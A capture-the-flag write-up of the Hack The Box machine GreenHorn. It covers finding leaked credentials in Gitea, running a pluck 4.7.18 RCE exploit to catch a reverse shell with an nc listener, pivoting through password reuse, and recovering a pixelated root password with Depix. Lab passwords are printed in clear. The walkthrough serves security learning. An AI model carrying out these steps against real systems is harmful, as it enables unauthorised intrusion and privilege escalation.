Hackthebox: GreenHorn

Foued SAIDI Lv4
  2024-12-06 11:04:05 2024-12-06 11:04:05 Created   2024-12-07 09:06:29 2024-12-07 09:06:29 Updated    

Overview

GreenHorn is an easy-difficulty machine from Hack The Box dealing initially with an exposed Gitea instance on port 3000 leading to an exposed hashed password which we can easily crack and perform a known Remote Code Execution exploit on pluck version 4.7.18 to land a shell. Later reusing same credentials to pivot to a new user and and our user flag. And finally a kindof CTFy challenge where we’ll be un-blurring a blurred password inside of PDF file using Depix to get our root flag. A bit fun and CTFy.

GreenHorn-info-card
GreenHorn-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
PS C:\Users\0xkujen> nmap -A -Pn 10.129.243.215 --unprivileged
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-06 11:17 W. Central Africa Standard Time
Nmap scan report for 10.129.243.215
Host is up (0.47s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Golang net/http server
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=9f5aa4ec0c774f5b; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=aXOh4QdKFxkpyQqDtbwe-PZB9II6MTczMzQ4MDYyOTE5OTQzMjE4MQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 06 Dec 2024 10:23:49 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=37743110979ab7c9; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=2mURmA5eek0cP98R8m5XcKO9Ryk6MTczMzQ4MDYzMDgwNjIxMTkwNg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 06 Dec 2024 10:23:50 GMT
|_    Content-Length: 0
|_http-title: GreenHorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
<snip>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.94 seconds

We can see that we have 3 open ports: ssh, http that’s redirecting us to greenhorn.htb so we can add that to our /etc/hosts and a port 3000 that’s a gitea instance ( we can tell from the cookie name).

Web Application - http://greenhorn.htb:3000 - Gitea

Navigating to the Gitea portal we can normally create an account without any admin approval:

Gitea
Gitea

We can then explore what this gitea instance holds for us:

Gitea
Gitea

We find a GreenHorn repo under http://greenhorn.htb:3000/GreenAdmin/GreenHorn that I guess holds the source code of the main http web app. I could go on and start doing some source code analysis, but I just relied on the lack of experience of the web developer (in the hacking context of course) and went to search for exposed creds, and BOOM:

Gitea
Gitea

We take this to Crackstation without having to launch my kali VM, and I get a hit:

Gitea
Gitea

(Yeah, I love you too!)

Now what are we gonna do with these creds?

Web Application - http://greenhorn.htb:80

Web Application
Web Application

It looks like a casual front for the website, however, we could see a powered by pluck message on the footer of the page.
pluck is a CMS, just like wordpress.

Doing a quick google ninja search for any pluck exploits or CVEs, I stumbled upon this pluck v4.7.18 RCE exploit which will only need me to provide it with the creds to be able to execute commands.
Let’s supply it with our previously captured creds like this login_payload = {"cont1": "iloveyou1","bogus": "","submit": "Log in"}, also creating a shell.php script to land a reverse shell on it(I simply used this php reverse shell script ):

1
2
3
PS C:\Users\0xkujen> python3 .\exploit.py
Login account
ZIP file download.

And we get a shell!

1
2
3
4
5
6
7
8
9
10
11
PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.243.215] 37750
Linux greenhorn 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 10:53:08 up 43 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Pivoting to junior - Password reuse

At the beginning I just thought of how I could do the pivoting, then, I just thought of reusing the same password again :)

1
2
3
4
5
6
7
8
www-data@greenhorn:/home$ su junior
su junior
Password: iloveyou1

junior@greenhorn:/home$ cd junior && cat user.txt
cd junior && cat user.txt
c89fc0240226ae******************
junior@greenhorn:~$

And we got our user flag!

Privilege escalation to root - Depix exploit

On the junior home directory there was some weird pdf file:

1
2
3
junior@greenhorn:~$ ls
ls
 user.txt  'Using OpenVAS.pdf'

Let’s go ahead and download it: We could do that by running ssh-keygen command on junior, later putting our public key in the .ssh/authorized_keys file and just download the file using scp command.
These were the contents of the file:

Blurry PDF
Blurry PDF

I instantly thought of using Depix (I’m a CTF player and I encountered this challenge countless times). You can read more about Depix to understand how it actually works.
Now the only trick with Depix is to know what image to use as your reference for de-blurring the pdf file, so we can do it using this one:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
PS C:\Users\0xkujen\Depix> python3 .\depix.py -p .\pass.png -s .\images\searchimages\debruinseq_notepad_Windows10_closeAndSpaced.png -o cleartext_password.png
2024-12-06 11:58:07,462 - Loading pixelated image from .\pass.png
2024-12-06 11:58:07,494 - Loading search image from .\images\searchimages\debruinseq_notepad_Windows10_closeAndSpaced.png
2024-12-06 11:58:08,428 - Finding color rectangles from pixelated space
2024-12-06 11:58:08,430 - Found 19 same color rectangles
2024-12-06 11:58:08,430 - 14 rectangles left after moot filter
2024-12-06 11:58:08,430 - Found 3 different rectangle sizes
2024-12-06 11:58:08,431 - Finding matches in search image
2024-12-06 11:58:08,431 - Scanning 12 blocks with size (1, 1)
2024-12-06 11:58:08,435 - Scanning in searchImage: 0/1678
2024-12-06 11:58:12,771 - Scanning 1 blocks with size (1, 3)
2024-12-06 11:58:12,774 - Scanning in searchImage: 0/1678
2024-12-06 11:58:15,767 - Scanning 1 blocks with size (14, 14)
2024-12-06 11:58:15,830 - Scanning in searchImage: 0/1665
2024-12-06 11:58:36,279 - Scanning in searchImage: 333/1665
2024-12-06 11:58:56,897 - Scanning in searchImage: 666/1665
2024-12-06 11:59:17,474 - Scanning in searchImage: 999/1665
2024-12-06 11:59:37,987 - Scanning in searchImage: 1332/1665
2024-12-06 11:59:58,540 - Removing blocks with no matches
2024-12-06 11:59:58,540 - Splitting single matches and multiple matches
2024-12-06 11:59:58,540 - [0 straight matches | 0 multiple matches]
2024-12-06 11:59:58,541 - Trying geometrical matches on single-match squares
2024-12-06 11:59:58,541 - [0 straight matches | 0 multiple matches]
2024-12-06 11:59:58,541 - Trying another pass on geometrical matches
2024-12-06 11:59:58,541 - [0 straight matches | 0 multiple matches]
2024-12-06 11:59:58,543 - Writing single match results to output
2024-12-06 11:59:58,543 - Writing average results for multiple matches to output
2024-12-06 11:59:58,543 - Saving output image to: cleartext_password.png
PS C:\Users\0xkujen\Depix>

And we get our password:

Cleartext password
Cleartext password

root:sidefromsidetheothersidesidefromsidetheotherside

And rooted:

1
2
3
root@greenhorn:~# cat root.txt
a1095ad7c9b638******************
root@greenhorn:~#

That was it for GreenHornn, hope you learned something new.
-0xkujen

  • Title: Hackthebox: GreenHorn
  • Author: Foued SAIDI
  • Created at : 2024-12-06 11:04:05
  • Updated at : 2024-12-07 09:06:29
  • Link: https://kujen5.github.io/2024/12/06/Hackthebox-GreenHorn/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: GreenHorn
  1. Overview
  2. Reconnaissance
  3. Web Application - http://greenhorn.htb:3000 - Gitea
  4. Web Application - http://greenhorn.htb:80
  5. Pivoting to junior - Password reuse
  6. Privilege escalation to root - Depix exploit